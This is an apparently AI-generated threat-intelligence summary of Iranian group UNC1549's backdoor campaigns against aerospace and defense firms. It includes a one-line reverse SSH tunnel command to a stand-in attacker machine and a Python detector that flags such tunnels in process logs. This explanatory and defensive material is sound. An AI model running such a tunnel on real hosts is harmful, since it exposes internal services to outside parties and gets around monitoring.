Iranian Hackers Use DEEPROOT and TWOSTROKE Malware in Aerospace and Defense Attacks
These articles are AI-generated summaries. Please check the original sources for full details.
Iranian Hackers Target Aerospace and Defense Industries
Iranian threat actor UNC1549 (aka GalaxyGato, Nimbus Manticore, or Subtle Snail) is actively deploying backdoors like TWOSTROKE and DEEPROOT against aerospace, aviation, and defense organizations in the Middle East. This activity, observed from late 2023 through 2025, highlights a sophisticated, multi-pronged approach to initial access and persistent compromise.
Why This Matters
Ideal security models assume robust defenses across all network segments, but the reality is that supply chains often present the weakest link. UNC1549’s exploitation of third-party relationships demonstrates the high cost – potentially billions in intellectual property theft and operational disruption – of failing to secure the entire ecosystem, not just the core organization.
Key Insights
- Third-party breaches: In 2024, UNC1549 compromised 11 European telecom companies via LinkedIn phishing (PRODAFT report).
- Initial Access Vectors: Leveraging trusted relationships (Citrix, VMware, Azure VDA) provides a lower-friction path than direct attacks.
- Stealth and Persistence: Backdoors can remain dormant for months and reactivate after remediation, prioritizing long-term access over immediate action.
Working Example
# Simplified illustration of a reverse SSH tunnel, the kind of functionality attributed to LIGHTRAIL.
# It does not represent the full complexity of the malware.
# Run on the compromised host (victim): connect outbound to the attacker-controlled machine and
# expose the victim's local web server (port 80) as port 8080 on that machine.
ssh -R 8080:localhost:80 attacker_machine
# On the attacker's machine, requests to http://localhost:8080 are now forwarded through the
# tunnel to the victim's web server.
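As an added defender-side example (not from the original article), the following Python flags ssh invocations in process-creation telemetry that open a remote forward (`-R`, bundled or attached forms, or `-o RemoteForward=`) to a host outside an allowlist, which is one way to surface the tunneling behaviour described above. The log lines, hostnames and allowlist are constructed for illustration.

```python
import re, shlex

# Constructed sample process-creation events (EDR/auditd style); not real telemetry.
SAMPLE_EVENTS = [
    'host=eng-ws-07 user=svc_build cmd="ssh -fN -R 8080:localhost:80 ops@203.0.113.25"',
    'host=cad-srv-02 user=root cmd="ssh -o RemoteForward=2222:127.0.0.1:22 -o ServerAliveInterval=30 relay@198.51.100.9"',
    'host=cad-srv-02 user=deploy cmd="ssh -NR9000:localhost:9000 deploy@bastion.corp.example"',
    'host=lab-01 user=ops cmd="ssh -L 5901:localhost:5900 ops@vnc.corp.example"',
]
ALLOWED_TUNNEL_HOSTS = {"bastion.corp.example"}  # assumed allowlist of legitimate tunnel endpoints (constructed)
ARG_OPTS = set("bcDEeFIiJLlmOopQRSWwB")  # ssh single-letter options that consume the next argument, per ssh(1)
CMD_RE = re.compile(r'cmd="([^"]*)"')

def parse_ssh_invocation(cmd):
    # Returns (remote_forward_specs, destination) or None when the command is not ssh.
    argv = shlex.split(cmd)
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return None
    forwards, dest, i = [], None, 1
    while i < len(argv):
        a = argv[i]
        if not a.startswith("-"):
            dest = a  # first non-option token is [user@]host
            break
        if a.startswith("-o"):  # -o RemoteForward=spec is the long form of -R
            opt = a[2:] or argv[i + 1]
            if opt.startswith("RemoteForward="):
                forwards.append(opt.split("=", 1)[1])
            i += 1 if a[2:] else 2
            continue
        r = a.find("R", 1)  # covers -R spec, bundled -NR spec, and attached -Rspec
        if r != -1:
            forwards.append(a[r + 1:] or argv[i + 1])
            i += 1 if a[r + 1:] else 2
            continue
        i += 2 if a[-1] in ARG_OPTS else 1  # skip the option and its argument, if any
    return forwards, dest

def flag_reverse_tunnels(events, allowed_hosts=ALLOWED_TUNNEL_HOSTS):
    # Flags ssh invocations that open a remote (-R) forward to a host outside the allowlist.
    findings = []
    for line in events:
        m = CMD_RE.search(line)
        parsed = parse_ssh_invocation(m.group(1)) if m else None
        if not parsed or not parsed[0] or parsed[1] is None:
            continue
        target = parsed[1].rsplit("@", 1)[-1]
        if target not in allowed_hosts:
            findings.append({"event": line.split()[0], "dest": target, "forwards": parsed[0]})
    return findings
```

Running `flag_reverse_tunnels(SAMPLE_EVENTS)` yields two findings (the forwards to 203.0.113.25 and 198.51.100.9); the bundled `-NR` forward to the allowlisted bastion and the local `-L` forward are not flagged.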
Practical Applications
- Use Case: Defense contractors utilizing managed service providers require continuous monitoring of third-party access and adherence to stringent security protocols.
- Pitfall: Relying solely on perimeter defenses while neglecting supply chain security creates a vulnerable attack surface for sophisticated adversaries.